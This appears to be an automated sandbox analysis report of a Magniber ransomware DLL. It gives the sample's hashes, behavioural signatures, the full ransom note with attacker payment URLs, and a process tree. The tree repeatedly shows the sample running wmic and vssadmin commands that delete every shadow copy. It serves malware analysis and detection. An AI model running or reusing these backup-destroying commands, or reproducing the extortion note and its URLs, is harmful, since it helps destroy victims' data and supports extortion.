Analysis

  • max time kernel
    142s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    29-08-2021 11:34

General

  • Target

    4.dll

  • Size

    38KB

  • MD5

    20dc89faf3ec56190b7eeb2e31807e42

  • SHA1

    7cf5f418a3fa466fadde536fb52c5df9594fb319

  • SHA256

    4f928d4bb28ac45b5d8a7ac8c0a4822dc23a4815a31bc4b4b2dd6ab34cb32a9b

  • SHA512

    7433189602bc530c4099ab2e4c2c19c433f6555386e385ea88ae163d5f6b3ab1c2f5dcb9d3101779a428ec669236e4f64ad13ee8ed7ce82a22d6be9bb6869fc9

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://d61084d87c784a7092cytywyhto.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/cytywyhto Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://d61084d87c784a7092cytywyhto.bitslet.uno/cytywyhto http://d61084d87c784a7092cytywyhto.canyour.xyz/cytywyhto http://d61084d87c784a7092cytywyhto.dogper.space/cytywyhto http://d61084d87c784a7092cytywyhto.ballcan.xyz/cytywyhto Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://d61084d87c784a7092cytywyhto.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/cytywyhto

http://d61084d87c784a7092cytywyhto.bitslet.uno/cytywyhto

http://d61084d87c784a7092cytywyhto.canyour.xyz/cytywyhto

http://d61084d87c784a7092cytywyhto.dogper.space/cytywyhto

http://d61084d87c784a7092cytywyhto.ballcan.xyz/cytywyhto

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 12 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 8 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\4.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Windows\system32\wbem\wmic.exe
        C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
          PID:2984
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
            PID:2996
            • C:\Windows\system32\wbem\WMIC.exe
              C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
              4⤵
                PID:3060
          • C:\Windows\notepad.exe
            notepad.exe C:\Users\Public\readme.txt
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:1664
          • C:\Windows\system32\cmd.exe
            cmd /c "start http://d61084d87c784a7092cytywyhto.bitslet.uno/cytywyhto^&1^&46770499^&67^&327^&12"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1668
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://d61084d87c784a7092cytywyhto.bitslet.uno/cytywyhto&1&46770499&67&327&12
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1440
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1440 CREDAT:275457 /prefetch:2
                4⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:920
          • C:\Windows\system32\wbem\wmic.exe
            C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:576
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:860
            • C:\Windows\system32\wbem\WMIC.exe
              C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:296
        • C:\Windows\system32\Dwm.exe
          "C:\Windows\system32\Dwm.exe"
          1⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1172
          • C:\Windows\system32\wbem\wmic.exe
            C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
            2⤵
              PID:2324
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2336
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                3⤵
                  PID:2380
            • C:\Windows\system32\taskhost.exe
              "taskhost.exe"
              1⤵
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:1104
              • C:\Windows\system32\wbem\wmic.exe
                C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                2⤵
                  PID:2656
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2668
                  • C:\Windows\system32\wbem\WMIC.exe
                    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                    3⤵
                      PID:2720
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  1⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:1248
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1400
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:1416
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Process spawned unexpected child process
                    • Interacts with shadow copies
                    PID:1056
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                      PID:1060
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2052
                    • C:\Windows\system32\cmd.exe
                      cmd /c CompMgmtLauncher.exe
                      1⤵
                      • Process spawned unexpected child process
                      • Suspicious use of WriteProcessMemory
                      PID:2436
                      • C:\Windows\system32\CompMgmtLauncher.exe
                        CompMgmtLauncher.exe
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2464
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2536
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2500
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2604
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2748
                      • C:\Windows\system32\cmd.exe
                        cmd /c CompMgmtLauncher.exe
                        1⤵
                        • Process spawned unexpected child process
                        • Suspicious use of WriteProcessMemory
                        PID:2796
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          CompMgmtLauncher.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2840
                          • C:\Windows\system32\wbem\wmic.exe
                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                            3⤵
                              PID:2884
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2936
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:860
                        • C:\Windows\system32\cmd.exe
                          cmd /c CompMgmtLauncher.exe
                          1⤵
                          • Process spawned unexpected child process
                          PID:836
                          • C:\Windows\system32\CompMgmtLauncher.exe
                            CompMgmtLauncher.exe
                            2⤵
                              PID:2076
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                3⤵
                                  PID:2212
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:1876

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/1020-71-0x0000000001B80000-0x0000000001B81000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-61-0x0000000001D50000-0x000000000233E000-memory.dmp

                              Filesize

                              5.9MB

                            • memory/1020-69-0x0000000001B60000-0x0000000001B61000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-68-0x0000000001B20000-0x0000000001B21000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-63-0x0000000000530000-0x0000000000531000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-72-0x0000000001C10000-0x0000000001C11000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-70-0x0000000001B70000-0x0000000001B71000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-65-0x0000000001AF0000-0x0000000001AF1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-74-0x0000000003E90000-0x0000000003E91000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-62-0x0000000000520000-0x0000000000521000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-64-0x0000000001AE0000-0x0000000001AE1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-67-0x0000000001B10000-0x0000000001B11000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-107-0x0000000003EB0000-0x0000000003EB1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1020-66-0x0000000001B00000-0x0000000001B01000-memory.dmp

                              Filesize

                              4KB

                            • memory/1104-73-0x00000000001D0000-0x00000000001D5000-memory.dmp

                              Filesize

                              20KB

                            • memory/1200-60-0x0000000002C30000-0x0000000002C40000-memory.dmp

                              Filesize

                              64KB

                            • memory/1664-76-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

                              Filesize

                              8KB